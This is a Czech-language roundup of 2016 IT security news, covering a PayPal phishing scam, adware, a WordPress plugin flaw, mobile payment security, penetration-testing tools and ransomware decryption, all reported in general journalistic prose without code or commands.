 Zdroj: Živě
Phishing
Pokud využíváte platební bránu PayPal, pak vám možná dorazil e-mail s informací, že byl váš účet uzamčen. Tím má být zamezeno neautorizovaným platbám a pro odemknutí je vyžadováno nové zadání platebních informací. Samozřejmě se jedná o podvod a jediným účelem je vylákat citlivé informace. Ve zprávě totiž nechybí formulář, do něhož má oběť vyplnit jméno, telefonní číslo nebo třeba rodné jméno matky, které bývá nejčastěji využíváno jako tzv. bezpečnostní otázka.

restore-account-paypal-phishing-scam-1-768x801.jpg
Podoba formuláře pro vyplnění údajů (zdroj: Hackread.com)

Nakonec má dojít k zadání čísla kreditní karty včetně dalších údajů jako je datum expirace a CVV2 kódu. Pokud je formulář odeslán, uživatel je přesměrován na domovskou stránku PayPalu, takže pro nepozorného či méně zkušeného surfaře, může proces vypadat jako legitimní.

V žádném případě však na podobné e-maily nereagujte. Pokud by PayPal k podobnému kroku sáhl, nikdy po vás nebude chtít nové zadávání platebních údajů. Formulář by se navíc nacházel na webu, který komunikuje pomocí HTTPS s certifikátem vystaveným pro www.paypal.com.


Google vytvoří seznam ostudy. Budou tam výrobci, kteří flákají upgrady Androidu
27.7.2016
 Zdroj: Živě
Zranitelnosti
Google podle Bloombergu chystá jakýsi seznam ostudy, který bude evidovat výrobce telefonů a tabletů s prehistorickými verzemi Androidu. Většina zařízení na trhu totiž používá Android 4.x – KitKat a dokonce čtyři roky starý Jelly Bean.

Novější Android 5.x Lollipop používá 35 % zařízení přistupujících k Play Storu a nejnovější Android 6 Marshmallow pak 7,5 % zařízení.

259320403
Zastoupení verzí Androidu na aktivních telefonech a tabletech s Androidem přistupujících ke službám Play na počátku května

Otázkou ovšem zůstává, jestli bude mít podobný seznam ostudy nějaký dopad, o verzi Androidu se totiž zpravidla zajímají jen poučení geekové a mnozí prodejci dokonce ani neuvádějí konkrétní verzi systému ve specifikaci produktu v jejich katalogu.

Běžným spotřebitelům je konkrétní verze mobilního systému často lhostejná a výrobci to kvitují, upgrade již prodaného telefonu je totiž jejich optikou vlastně investice navíc, která ke všemu vede jen k tomu, že oddálí nákup nového telefonu.

Tradičně tak nejnovější verzí Androidu disponují především telefony z programu Nexus. Čistý Android bez dalších nadstaveb a funkčních vychytávek však nemusí každému vyhovovat. Nexus je tak vhodný především pro androidí puristy.


Pokud vyfotíte zloděje, můžete jeho snímek zveřejnit na Facebooku, rozhodl pražský soud
27.7.2016
Zdroj: Živě
Sociální sítě
Představte si tu situaci. Instalujete si bezpečnostní kameru, která pořídí záznam zloděje, a když snímek publikujete na sociální síti a podaří se vám zlosyna lapit, Úřad na ochranu osobních údajů vám udělí pokutu, protože jste porušili jeho právo na soukromí.

Přesně to se před lety stalo i majiteli prodejny s elektrokoly ekolo.cz v tehdy mediálně sledované kauze. Jakub Dittrich neuspěl ani s odvoláním, a proto se nakonec obrátil na soud, který minulý týden rozhodl v jeho prospěch.

Podle webu Novinky.cz Městský soud v Praze rozhodl tak, že pachatel trestné činnosti musí počítat s tím, že jeho práva nebudou chráněná stejně jako práva osob, které jednají v souladu se zákonem. České právo sice není příliš precedentní, rozhodnutím pražského soudu by se ale mohly ku prospěchu všech inspirovat i ostatní.


Google se chce obejít bez hesel. Testuje Trust API
27.7.2016
 Zdroj: Živě
Zabezpečení
Frekvence zadávání všemožných hesel by se mohla snížit – alespoň na Androidu, Google totiž minulý týden na I/O oznámil testování nového Trust API. Pokud se osvědčí, vývojáři by se k němu mohli dostat v závěru roku.


Trust API nahrazuje zadávání exaktního hesla sledováním různých indikátorů – třeba polohy, charakteru psaní, údajů z 3D kamery a tak dále. Vlastně to celé připomíná novou verzi jeho služby reCAPTCHA pro weby, která se pokusí zjistit, jestli jste robot, nebo člověk, aniž byste museli opisovat jakákoliv špatně čitelná písmenka a číslice.

Těžko říci, jestli je technologie Trust API v takovém stavu, aby mohla nahradit zadávání hesla ve všech případech, ale alespoň pro začátek by mohla sloužit tam, kde je sice třeba chránit přístup heslem, případně je třeba se prostě autentifikovat, ale nejedná se o kritickou službu.


FBI využívá ke sledování díru, která je zřejmě i ve Firefoxu. Mozilla chce chybu znát, ale neuspěla ani u soudu
27.7.2016 
Zdroj: SecurityWorld
Zranitelnosti
Američtí federální vyšetřovatelé z FBI objevili díru v zabezpečení internetového prohlížeče Tor Browser, díky které mohli sledovat a dopadnout uživatele serveru s dětskou pornografií. Tor Browser je však prohlížeč postavený na Firefoxu a je docela možné, že se chyba v zabezpečení týká i Firefoxu samotného. Mozilla by se proto o ní ráda dozvěděla, ale FBI odmítá objevenou chybu prozradit.

Když to nešlo běžnou domluvou, zkusila to Mozilla dokonce u soudu. Ten se však nyní postavil na stranu FBI a rozhodl, že vyšetřovatelé kýženou informaci Mozille poskytovat nemusí, informuje Computerworld.

Mozilla se opírá především o argumenty založené na tom, že pokud by se chyba týkala i Firefoxu, byla by ohrožena bezpečnost počítačů milionů uživatelů. Pokud o chybě v zabezpečení ví FBI, může o ni vědět i někdo jiný a zneužívat ji.

Zajímavý případ připomíná nedávný podobný spor Applu. Po firmě vyšetřovatelé původně chtěli, aby jim poskytla přístup k zašifrovaným datům v úložišti iPhonu kvůli vyšetřování. Požadavek byl adekvátní, ale Apple nepomohl s tím, že ze zašifrovaného telefonu nemá jak data dostat a že neexistují žádná "zadní vrátka". V FBI nakonec zabezpečení nějak pokořili. Apple chtěl pochopitelně vědět jak, protože by to mohlo znamenat bezpečnostní díru v iPhonu. Ale podobně jako Mozilla neuspěl.


Nová chyba ve Windows vás zahltí nechtěnou reklamou

8.6.2016 Zdroj: ComputerWorld Zranitelnosti
Nová verze malwaru DNS Unlocker umožňuje měnit výchozí konfiguraci DNS, díky čemuž může zasažené uživatele začít zásobovat nadměrnou reklamou.
Analytici Esetu detekovali novou verzi adwaru DNS Unlocker s unikátní schopností měnit výchozí konfiguraci DNS. Typickým příkladem, jak DNS Unlocker ovlivňuje napadený počítač, je zobrazování reklam, které jako zdroj uvádí DNS Unlocker, a několika variantami podvodných stránek upozorňujících na údajnou nákazu počítače.

„DNS útoky nejsou tak destruktivní – řekněme v porovnání s ransomwarem – a bývalo vždy jednoduché je eliminovat. U nové varianty DNS Unlocker to však už neplatí,“ říká Petr Šnajdr, bezpečnostní expert v Esetu.

Analytici zjistili, že nový typ DNS Unlocker dokáže oklamat operační systém Windows tak, aby zobrazoval jiné hodnoty nastavení DNS, než je tomu ve skutečnosti.

„V grafickém rozhraní se nadále zobrazuje, že používáte automaticky přiřazenou adresu DNS serveru, ale ve skutečnosti používáte adresu statickou. Stručně řečeno, jedná se o DNS útok, který si vynutí používání podvržených serverů DNS. Proto jde o problém, který je pro běžného uživatele velmi těžko řešitelný,“ tvrdí Šnajdr.

Základní problém prý spočívá v tom, jak systém Windows pracuje s DNS adresami. Podrobné informace o svých zjištěních proto Eset zaslal Microsoftu, který podle jeho slov uznal, že jde chybu, ale bohužel ji neklasifikoval jako potenciální zranitelnost.

"Jelikož úprava registru vyžaduje administrátorská práva, nepovažujeme tento problém za natolik nebezpečný, abychom ho řešili prostřednictvím servisu MSRC,“ odpověděli zástupci Microsoftu.

Možná preventivních opatření podle Esetu:

Nenechávejte uživatele s administrátorskými právy surfovat na internetu; pokud ano, pak pouze v nezbytných případech.
Pokud zaregistrujete nevyžádané reklamy, zejména v případě, pokud mají dole v patičce uveden původ DNS Unlocker, zkontrolujte si nastavení DNS serverů v pokročilém menu nastavení TCP/IP.
Pokud spatříte pop-up okno s nabídkou nějakého druhu podpory, buďte extrémně opatrní a před jakýmkoli dalším krokem si zkontrolujte nastavení DNS.
Pokud máte jakékoli pochybnosti o nastavení DNS, můžete odstranit podezřelé položky na kartě DNS na stránce pokročilých nastavení TCP/IP. Kontrolou počítače pomocí některých on-line skenerů lze také malware DNS Unlocker odstranit.
Dodržujte všechna základní pravidla pro bezpečné používání internetu, včetně toho, abyste používali kvalitní bezpečnostní řešení.


Výzkum: Zaměstnanci nedbají na bezpečnost

27.7.2016   Zdroj: ComputerWorld Hrozby
Dobrou zprávou je, že oproti loňsku výrazně vzrostl počet lidí, kteří k zajištění vzdáleného přístupu k datům používají bezpečné firemní nástroje. Špatnou zprávou je, že současně roste i počet lidí, kteří si stále práci domů posílají přes soukromý email.

Využívání firemního cloudu letos oproti roku 2015 výrazně vzrostlo (z 29 % na 43 %) a Česko se tak z loňských spodních příček dostalo na evropský průměr (45%). Téměř polovina (46 %) zaměstnanců si ale stále ještě posílá pracovní soubory na soukromý email, což je o 7 procentních bodů více než loni.

Využívání spotřebitelských úložišť se zdvojnásobilo (ze 14 % na 30 %). Soukromé maily ani běžná úložiště přitom nemohou zajistit potřebnou míru ochrany citlivých obchodních informací. Vyplývá to z nového ročníku průzkumu Náskok díky technologiím, který si nechal zpracovat Microsoft.

Lidé chápou nutnost dobře chránit informace, ke kterým na dálku přistupují. 9 z 10 šéfů a 79 % zaměstnanců zdůraznilo, že při práci mimo kancelář je nezbytné zajistit bezpečnost dat.

„Jenže praxe stále ještě pokulhává. Používání soukromých mailů pro sdílení pracovních dokumentů může pro firmy představovat časovanou bombu,“ uvedl Ondřej Novodvorský, ředitel pro malé a střední firmy z Microsoftu. "Do práce patří profesionální pracovní nástroje a platí to i o technologiích."

Není přitom řešním mobilitu omezovat. V letošním průzkumu uvedly téměř tři čtvrtiny (72 %) zaměstnanců českých SMB, že možnost pracovat mimo kancelář zvyšuje jejich produktivitu. Firmy by se jejím omezením připravily o důležitý zdroj výkonnosti, kreativity i nových obchodních příležitostí.

„Lidé dnes mobilně žijí a jsou zvyklí komunikovat a sdílet na dálku. Pokud firma svým zaměstnancům nenabídne bezpečné nástroje a nenaučí je správně používat, najdou si jinou cestu. A to může být pro bezpečnost firemních dat velký problém,“ řekl Ondřej Novodvorský.


Neopravená chyba ve WordPress pluginu ohrožuje tisíce webů

27.7.2016    Zdroj: ComputerWorld Zranitelnosti
Vada v zásuvném modulu Mobile Detector v oblíbeném systému pro správu obsahu umožnil hackerům nahrát škodlivá data na servery.
Během posledního týdne se útočníkům podařilo zneužít chybu, která se objevila v oblíbeném WP Mobile Detector pluginu, instalovaném na více než 10 tisíc webových stránkách.

Vývojář zásuvného modulu chybu opravil již v úterý ve verzi 3.6; uživatelé by se tak měli ujistit nejen, že mají nejnovější verzi pluginu, ale také, zda nejsou jejich stránky již napadeny.

Zneužití je možné díky skriptu zvaném resize.php a umožňuje vzdáleným útočníkům nahrávat soubory na webový server. Mezi takové soubory mohou patřit např. backdoor shell skripty, které hackerům poskytnou zadní vrátka přístupu na server a umožní jim vkládat části kódu na webové stránky.

Chybu objevil bezpečnostní systém Wordpressu PluginVulnerabilities.com poté, co sledoval requesty na soubor wp-content/plugins/wp-mobile-detector/resize.php, ačkoli ten na serveru neexistoval. To znamená, že někdo používal automatický sken, aby vyhledal tento konkrétní soubor, což obvykle bývá právě z důvodu možné zneužitelné chyby.

Výzkumníci z bezpečnostní agentury Sucuri, specializované na webové zabezpečení, analyzovali logy z firewallu společnosti a nalezli několik pokusů o zneužití chyby, začínaje 27. květnem; tedy čtyři dny před vydáním opravné aktualizace. Je však možné, že útočníci o vadě věděli již dříve.

WP Mobile Detector (pozor na záměnu s jiným, nenakaženým pluginem jménem WP Mobile Detect) měl na počátku května přes 10 tisíc aktivních instalací. Nyní se toto číslo smrsklo na pouhou pětinu, ale z části je to i proto, že po detekci chyby WordPress zásuvný modul na čas odstranil.

Aby útočníci mohli vadu v resize.php zneužít, musí server mít povolenu funkci allow_url_fopen. To do jisté míry limituje nebezpečnost závady.

Protože není jasné, kolik webových stránek bylo nakaženo, je dobrý nápad, jste-li uživatelem dané aplikace, zkontrolovat svůj server.

„Valná většina zranitelných stránek je nyní infikována spamem skrze doorway weby, odkazujících obvykle na pornostránky,” popisuje výzkumník ze Sucuri Douglas Santos. „Standardně najdete složku gopni3g v kořenovém adresáři, která obsahuje soubor story.php (která doorwaye umožňuje), .htaccess a podsložky se spam soubory a šablonami.”

 


Flowmon nabídne monitoring sítě i přes mobil

27.7.2016   Zdroj: ComputerWorld Mobilní
Flowmon Friday – to je název akce, v rámci které firma Flowmon Networks koncem května seznámila veřejnost s novými řešeními zaměřenými na monitorování a bezpečnost počítačových sítí. Partnerem konference baly IDG Czech Republic.

Během programu se návštěvníci mohli seznámit s novinkami v řešení Flowmon, jako je například nová architektura ukládání datových toků, větší viditelnost do aplikační vrstvy nebo rychlejší detekce incidentů, a vývojem technologie monitorování síťového provozu.

Vedle toho Pavel Minařík, technický ředitel Flowmon Networks, představil zbrusu novou mobilní aplikaci pro operační systémy iOS a Android. Díky ní mají uživatelé Flowmonu přehled o své síti kdekoliv a kdykoliv na svém mobilním zařízení.

Z řad technologických partnerů vystoupil na konferenci Jaromír Pilař z Cisco Systems, který se věnoval síťové infrastruktuře jako klíčovému prostředku pro detekci a kontrolu hrozeb.

Praktická nasazení a přínosy řešení Flowmon napříč různými segmenty pak postupně představili Miloš Němec z Kofoly, Aneta Coufalíková z Centra CIRC Ministerstva obrany, Daniel Dvořák z Vysoké školy chemicko-technologické v Praze a Filip Višenka ze Slovenské spořitelny.

Na konferenci byli také vyhlášeni nejúspěšnější partneři společnosti za rok 2015. Titul českého Distributora roku si odnesl Veracomp, partnerem roku pak společnost Dimension Data. Obě ocenění předal Zoltán Csecsödi, nový obchodní ředitel Flowmonu pro Českou republiku, jenž byl na konferenci oficiálně ve funkci představen.

„Příští rok to bude deset let existence Flowmonu. Z malého týmu se nám podařilo vytvořit úspěšnou společnost, které se daří růst u nás i v zahraničí,“ dodal Rostislav Vocilka, ředitel společnosti Flowmon Networks.


Mobilní platby: Zabezpečí vás při nich lépe hardware, nebo software?

27.7.2016    Zdroj: ComputerWorld Mobilní
Platební systémy se stále častěji dostávají do hledáčku obchodníků i uživatelů. Je ale jejich používání opravdu bezpečné? A které řešení se ukazuje jako vhodnější?

Google oznámil svou platformu Android Pay a jedná s operátory o předinstalaci tohoto systému do telefonů se systémem Android. Samsung zase o prázdninách v Evropě zprovoznil svůj vlastní platební systém Samsung Pay, PayPal se oddělil od firmy eBay a koupil dodavatele platební technologie, firmu Xoom.

Pro spotřebitele se rozhodnutí pravděpodobně zredukuje na to, zda mít telefon iPhone nebo Android a jaké aplikace je snadnější používat a jsou akceptované většinou obchodníků.

Obchodníci pokračují v implementacích podpory pro mobilní platby. Naštěstí se nebudou muset rozhodovat mezi podporou platforem Apple a Google – přidání podpory pro jednu automaticky znamená schopnost akceptovat druhou.

Ale co používané back-endové technologie? Jak na tom jsou z hlediska bezpečnosti? Podle bezpečnostních expertů existuje několik způsobů realizace a každý má své vlastní bezpečnostní důsledky.

Hardware versus software

Hlavním rozdílem mezi platformou Apple Pay a většinou ostatních mobilních platebních platforem je, že Apple Pay používá hardwarové zabezpečení a bezpečnostní prvek uvnitř telefonu, chráněný proti neoprávněné manipulaci.

V telefonech iPhone se pro další zabezpečení používá kombinace se čtečkou otisků prstů.

Podle Adama Kujawy, šéfa antimalwaru ve společnosti Malwarebytes, se nepřenášejí žádné nešifrované osobní údaje. Jediné dosud ohlášené bezpečnostní problémy se týkají úvodního nastavení, kdy podvodníci dokázali přesvědčit operátory k přiřazení ukradených platebních karet ke svým telefonům iPhone.

Zloději by navíc teoreticky mohli dokázat oklamat čtečky otisků prstů a uskutečnit neoprávněné platby, uvádí Kujawa. Největší nevýhody platformy ApplePay však podle něj nejsou technické, ale spíše praktické.

Tyto telefony jsou totiž relativně drahé a neexistuje žádný způsob placení v případě, když například dojde k vybití baterie iPhonu.

Hlavní alternativou pro bezpečnostní prvek je HCE (Host Card Emulation – hostitelská emulace karty, kterou v tuzemsku nyní začíná jako prý první lokální banka provozovat Komerční banka). Je to softwarová alternativa k hardwarově založenému zabezpečení a používá cloudový tokenizační proces.

„Z bezpečnostního hlediska poskytuje HCE nejlepší ochranu, protože šifrování a předávání vašich finančních informací je v rukách příslušné banky a neexistuje spojení mezi platebními informacemi a samotným zařízením v případě, že dojde k jeho krádeži,“ tvrdí Kujawa.

Existuje zde však riziko, že by mohly speciálně vytvořené škodlivé aplikace unést proces HCE a ukrást uživatelům peníze.

Ideální kombinací by podle Kujawy byl bezpečný prvek v zařízení v kombinaci s HCE a biometrickou autentizací.

Mobilní telefony versus web

Přes všechny diskuze týkající se ApplePay a toho, co Google a Samsung mohou nebo nemohou dělat, nemá většina uskutečněných mobilních plateb se žádnou z těchto technologií nic společného.

Namísto toho jsou webové platby vykonané jednoduše prostřednictvím prohlížečů v mobilních zařízeních nebo specializovaných aplikacích. Například Amazon má nákupní aplikaci pro chytré telefony či tablety a PayPal disponuje mobilní aplikací, která vám umožní poslat peníze přátelům.

Podle platební společnosti Adyen tyto dva druhy mobilních plateb tvoří 27 procent všech on-line plateb v prvním čtvrtletí letošního roku, což je nárůst o 39 procent ve srovnání se stejným obdobím loňského roku.

Malá část těchto mobilních plateb se týká lokálních nákupů – například tak můžete platit v kavárnách Starbucks a za svou jízdu s využitím služby Uber pomocí jejich aplikací.

Tyto osobní mobilní platby vytvořily podle agentury Forrester Research jen v USA obrat 3,74 miliardy dolarů. Forrester však očekává, že porostou rychleji než další druhy mobilních plateb a do roku 2019 dosáhnou 34,2 miliardy dolarů.

S ohledem na bezpečnost je nevýhodou tohoto přístupu totéž co u jakéhokoli webového platebního systému, popisuje Andrew Blaich, bezpečnostní analytik ve společnosti BlueBox Security. Pokud by došlo k úniku dat, mohli by počítačoví zločinci potenciálně ukrást všechny uložené finanční informace o uživatelích.

„Pokud někdo ukradne vaše uživatelské jméno a heslo, může se za vás vydávat a vaším jménem i platit,“ upozorňuje Blaich.

Kromě toho může dojít ke kompromitaci samotných mobilních aplikací, popisuje Andrew McLennan, viceprezident společnosti Metaforic, která se zaměřuje na mobilní bezpečnost. To se již stalo oběma aplikacím – Starbucks i Uber.

Hackeři mohou stáhnout aplikace, udělat root zařízení, v případě potřeby vypnout bezdrátovou konektivitu a poté vynaložit veškerý potřebný čas k analýze aplikací.

„Jakmile to dokončí, mohou na základě získaných informací vytvořit zbraně pro hromadné útoky – od jednoduchých krádeží po zákeřnější sbírání osobních dat pro budoucí použití daleko od původní aplikace,“ varuje McLennan.


Nástroje pro penetrační testování: Vyberete si?

27.7.2016   Zdroj: ComputerWorld Zabezpečení
Pokud nemáte žádné obavy, že by vaše IT vybavení mohli napadnout zahraniční či místní útočníci, je pro vás tento článek zbytečný. Pokud však žijete ve stejné realitě jako zbytek z nás, mohou vám rady od skutečného profesionála, týkající se solidních nástrojů pro preventivní penetrační testování, velmi pomoci.
Evan Saez, který je nadšencem, návrhářem a programátorem penetračního testovacího nástroje a pracuje jako analytik kybernetických hrozeb ve společnosti Lifars, promluvil o nejnovějších a nejlepších penetračních nástrojích a o vhodném způsobu jejich použití. Tady jsou jeho postřehy.

Dostupné nástroje pro penetrační testování

Nástroje pro penetrační testování, o kterých se zde bude mluvit, zahrnují Metasploit, Nessus Vulnerability Scanner, Nmap, Burp Suite, Owasp ZAP, SQLmap, Kali Linux a Jawfish (Evan Saez je vývojářem projektu Jawfish).

Tyto nástroje jsou klíčem k zabezpečení podniku, protože jsou to ty samé produkty, které používají útočníci. Pokud nenajdete své díry a neopravíte je, najdou je oni.

Metasploit je framework s větší základnou programátorských fanoušků, který se rozšiřuje o vlastní moduly fungující jako testovací nástroje k otestování slabin v operačních systémech a aplikacích.

Lidé vydávají tyto vlastní moduly na serverech GitHub a Bitbucket. Bitbucket je stejně jako GitHub on-line repozitářem pro programátorské projekty.

„Metasploit je zřejmě nejpopulárnějším řešením svého druhu pro penetrační testování,“ uvádí Saez.

Nessus Vulnerability Scanner je na signaturách založený nástroj pro vyhledávání zranitelností. „Nessus dokáže pouze porovnávat výsledky skenování s databází známých signatur zranitelností,“ popisuje Saez.

Síťový skener Nmap umožňuje penetračním testérům zjistit typy počítačů, serverů a hardwaru, které má podnik ve své síti.

Skutečnost, že jsou tyto stroje identifikovatelné prostřednictvím těchto externích sond, je sama o sobě zranitelností. Útočníci používají tyto informace k vytvoření základů pro útoky.

Burp Suite je dalším oblíbeným nástrojem pro penetrační testování, určeným pro webové aplikace. Mapuje a analyzuje webové aplikace, vyhledává a umí zneužít zranitelnosti, jak uvádí společnost PortSwigger, která je dodavatelem nástroje Burp Suite pro zabezpečení webu.

Owasp ZAP (Zed Attack Proxy) je řešení pro penetrační testování webových aplikací od neziskového projektu Owasp (Open Web Application Security Project). Nabízí automatizované a manuální skenování webových aplikací, jehož účelem je pomoci nováčkům i zkušeným profesionálním penetračním testérům. ZAP je open source systém dostupný na webu GitHub.

SQLmap automatizuje odhalování děr typu SQL Injection. Ty se potom snaží zneužít a získat úplnou kontrolu nad databázemi a hostujícími servery.

Kali Linux představuje komplexní nástroj obsahující předinstalovanou sadu specializovaných penetračních testovacích (a bezpečnostních a forenzních) nástrojů. „Obsahuje nástroje použitelné pro lidi, kteří nemají v oblasti bezpečnosti žádné znalosti,“ popisuje Saez.

Jawfish je na rozdíl od většiny nástrojů založených na signaturách řešením, které využívá genetické algoritmy. „Genetické algoritmy hledají věci v kontextu vyhledávání,“ vysvětluje Saez.

Na základě vyhledávacích kritérií, jak se Jawfish dostává blíže k tomu, co se hledá (v tomto případě zranitelnost), nakonec nějakou může najít. Jawfish nevyžaduje databázi signatur.

Jak je používat

Metasploit, Nessus Vulnerability Scanner, Nmap, Burp Suite, Owasp ZAP, SQLmap, Kali Linux a Jawfish mají své specifické využití. Většina podniků tak bude potřebovat více nástrojů.

Metasploit nabízí jak rozhraní Ruby, tak i příkazový řádek, takže si váš penetrační testér může vybrat libovolné z nich v závislosti na tom, co právě chcete dělat.

„Rozhraní Ruby je vhodnější pro testování velmi rozsáhlé sítě, protože spouštění příkazů z příkazového řádku by bylo příliš zdlouhavé,“ vysvětluje Saez.

Nessus Vulnerability Scanner hledá otevřené porty v počítačích a firewallech a instalace potenciálně zranitelného softwaru. „Pokud jde o penetrační testování, je tento nástroj méně užitečný, protože je příliš nápadný a při zjišťování zranitelností jde tzv. předními dveřmi a komunikuje s operačním systémem.

Toto řešení se obvykle používá při kontrole dodržování předpisů ke zjišťování, zda jsou nainstalované všechny záplaty,“ vysvětluje Garrett Payer, vedoucí technolog v konzultační a implementátorské společnosti ICF International.

Nmap je dobré používat k vyhledávání hostitelů, otevřených portů, verzí softwaru, operačních systémů, verzí hardwaru a zranitelností – obecně k mapování terénu pro síťový útok.

Je užitečný v každé fázi penetračního testování, kdykoli máte novou sadu hostitelů, portů a dalších prostředků, které je potřebné identifikovat, například při zadávání nového segmentu sítě.

„Tento systém nabízí funkci skriptování a je užitečný pro výčet uživatelského přístupu,“ dodává Payer.

K mapování webových aplikací používejte Burp Suite a webový prohlížeč. Nástroje uvnitř sady Burp Suite zjišťují funkcionalitu aplikací a bezpečnostní díry a potom zahájí vlastní útoky.

Burp Suite automatizuje opakované funkce, a přitom uživateli ponechává volbu pro případy, kdy penetrační testér potřebuje kontrolu nad jednotlivými možnostmi testování.

„Tento funkcemi nabitý nástroj zkoumá skriptování mezi weby a další zranitelnosti pomocí proxy,“ popisuje Payer. „Přináší to transparentnost toho, co webové stránky vlastně posílají na server.“

Owasp ZAP vykonává různá skenování a testy včetně skenování portů, skenování hrubou silou a fuzzingu za účelem nalezení nezabezpečeného kódu. Penetrační testéři používají intuitivní grafické uživatelské rozhraní podobné aplikacím Microsoftu a některé nástroje pro design webu (jako je například Arachnophilia).

Poté, co začnete surfovat a uděláte na webu potřebné úkony, znovu použijete ZAP a můžete vidět kód a co se stalo při těchto činnostech. Owasp ZAP nastavíte jako proxy server a začne kontrolovat webový provoz, který zpracovává.

„Tento nástroj je novější než Burp Suite, nemá tolik funkcí, ale je zdarma jako open source. Poskytuje podmnožinu funkcí a grafické uživatelské rozhraní, které je užitečné pro lidi, kteří s penetračním testováním webových aplikací teprve začínají,“ uvádí Payer.

Řešení SQLmap se používá pomocí příkazů Pythonu na příkazové řádce k testování nesprávně naprogramovaných webových stránek a adres URL spojených s databázemi. Pokud škodlivě vytvořený odkaz (URL) do databáze vyvolá chybu, potom je takový odkaz předmětem útoku.

SQLmap se instaluje do operačního systému Ubuntu Linux ve virtuálním stroji. „SQLmap je vhodný pro skriptování. Umí zjistit takové věci, jako například zda programátor parametrizoval vstupy,“ uvádí Payer.

Pokud ne, mohou penetrační testér či útočník odeslat jméno, středník a SQL příkaz a spustit ho v databázi a získat kontrolu, vysvětluje Payer.

Nainstalujte si Kali Linux a spusťte libovolný z desítek integrovaných nástrojů pro penetrační testy a útoky. „Kali Linux je k dispozici s velkým množstvím uživatelské dokumentace,“ uvádí Saez.

Penetrační testovací řešení Jawfish můžete zkusit použít pomocí dostupného formuláře grafického uživatelského rozhraní. Jednoduše zadejte IP adresu serveru, zranitelnou webovou adresu na této IP adrese, zranitelnost, metodu a cílový text.


Na náš trh míří další „superbezpečný“ telefon

27.7.2016   Zdroj: ComputerWorld Mobilní
GranitePhone, podle dodavatele vysoce zabezpečený mobilní telefon, uvedla na náš trh firma Satomar. Novinka zahrnuje systém Sikur, jenž běží nad Androidem a zajišťuje několikanásobné šifrování přenášených informací.
GranitePhone hardwarově představuje běžný mobilní telefon s podporou LTE, který je však vybaven speciálním operačním prostředím. Jako základ slouží upravený systém Android 5.1, na kterém běží prostředí Sikur OS.

Ten umožňuje komunikaci s jakýmkoli jiným telefonem, mobilním zařízením či počítačem stejně, jako každý jiný mobil. Jakmile však dojde k výměně informací mezi dvěma GranitePhony nebo mezi GranitePhonem a jiným přístrojem s řešením Sikur, posílaná data a hovory se vícenásobně šifrují.

Kromě použití šifrování AES s délkou klíče 256 bitů je použit také kódovací algoritmus RSA s délkou klíče 2 048 či 4 096 bitů a další hashovací funkce. Díky tomu jsou šifrovací procesy v různých úrovních komunikace podle výrobce zdvojnásobené až ztrojnásobené.

GranitePhone kvůli svému zaměření za ochranu uživatelů neumožnuje instalaci aplikací z obchodu Google Play. Obchod s aplikacemi totiž není vůbec součástí systému, který tak obsahuje pouze základní aplikace pro telefonování, e-mailovou komunikaci, SMS, webový prohlížeč, kalkulačku a speciální zabezpečený chat.

Dodavatel chystá přidat ještě mapy s navigací, hodiny, poznámky a kalendář, v další vlně pak prý i některé další aplikace.

Sikur je k dispozici pro Android od verze 4.0, iOS od verze 7.0 a také pro počítače s Windows. Po uplynutí 30denni zkušební verze je k dispozici ve dvou variantách.

Essential zajišťuje základní funkce zabezpečené skupinové komunikace s tím, že počet odeslaných šifrovaných zpráv je omezen na 15 měsíčně, stejně tak jako počet šifrovaných hovorů. Tato varianta je k dispozici za cenu 350 Kč, resp. 13 € měsíčně. Verzi Enterprice bez jakýchkoli omezení objemu šifrované komunikace je možné využívat za 490 Kč, resp. 18,5 € měsíčně.

Samotný přístroj GranitePhone se systémem Sikur je k dostání za cenu 29 990 Kč, resp. 1 110 eur včetně DPH.


Zašifrovaní ransomwarem TeslaCrypt? Eset prý dokáže data zase zpřístupnit

27.7.2016   Zdroj: ComputerWorld Viry
Nástroj, který dokáže obnovit soubory zašifrované pomocí ransomwaru TeslaCrypt, uveřejnil Eset. Dokáže to ale jen u novějších verzí TeslaCrypt 3 nebo 4. Novinka je ke stažení na webových stránkách dodavatele.
Operátoři ransomwaru TeslaCrypt nedávno ohlásili, že ukončují své škodlivé aktivity. Při této příležitosti jeden z analytiků Esetu anonymně kontaktoval útočníky přes kanál určený obětem TeslaCrypt a požádal jej o univerzální dešifrovací klíč (tzv. master key).

Žádost byla překvapivě kladně vyřízená, což umožnilo Esetu vytvořit řešení pro ty, kteří ztratili přístup ke svým souborům.

TeslaCrypt se poprvé objevil na scéně začátkem roku 2015 a začal se soustředit na obsah spojený s hrami, jako jsou například uložené pozice, uživatelské mapy, ale i na osobní dokumenty a obrázky – celkem šlo o 185 různých koncovek souborů.

Nástroj Esetu dokáže dešifrovat soubory zakódované TeslaCryptem s koncovkou .xxx, .ttt, .micro nebo .mp3, a samozřejmě i ty, jejich koncovka se šifrováním nezměnila.


Jaké jsou aktuálně nejčastější hrozby v Česku?

27.7.2016    Zdroj: ComputerWorld Hrozby
Globálně nejvíce zlobí červ Bundpil, v Česku se ale momentálně nejčastěji šíří infikované přílohy e-mailu.
Žebříček deseti největších bezpečnostních hrozeb v IT za měsíc duben zveřejnil Eset. Podle něj oproti březnu výrazně stouplo rozšíření škodlivého červa Bundpil, který se šíří prostřednictvím vyměnitelných médií. Druhou nejčastější hrozbu představuje trojan Nemucod, třetí je potom Javascript Danger.ScriptAttachment. Ten je ve světovém měřítku třetí, v České republice se jedná o hrozbu nejčastější.

„Červ Bundpil obsahuje URL, ze které se snaží do napadeného zařízení stáhnout několik souborů. Ty se pak instalují a umožňují do zařízení stahovat další škodlivé kódy,“ popisuje Petr Šnajdr, expert Esetu.

Bundpil předstihl trojského koně Nemucod. I ten však nadále zaznamenával zvýšený výskyt a v žebříčku deseti největších kybernetických hrozeb za měsíc duben se posunul na druhé místo.

Nemucod používají hackeři jako prostředek pro instalaci dalších škodlivých kódů a ovládnutí infikovaného zařízení. „Jde o klasický downloader, který se šíří jako příloha e-mailových zpráv. Nejčastěji se maskuje jako faktura nebo pozvánka k soudu,“ konstatuje Šnajdr.

Nově se v desítce nejaktivnějších škodlivých kódů objevuje na třetí pozici JS/Danger.ScriptAttachment, což je škodlivý soubor, který se šíří jako příloha e-mailu a může způsobit stažení malware. „Jde o detekci, která podle obecnějších kritérií posuzuje škodlivost zprávy. Detekce JS/Danger pokrývá jiným algoritmem varianty škodlivého kódu Nemucod, a proto je část Nemucodu detekována jako JS/Danger. V českém prostředí se jedná o hrozbu nejčastější, identifikujeme ji ve více než čtvrtině všech případů,“ vysvětluje Šnajdr.

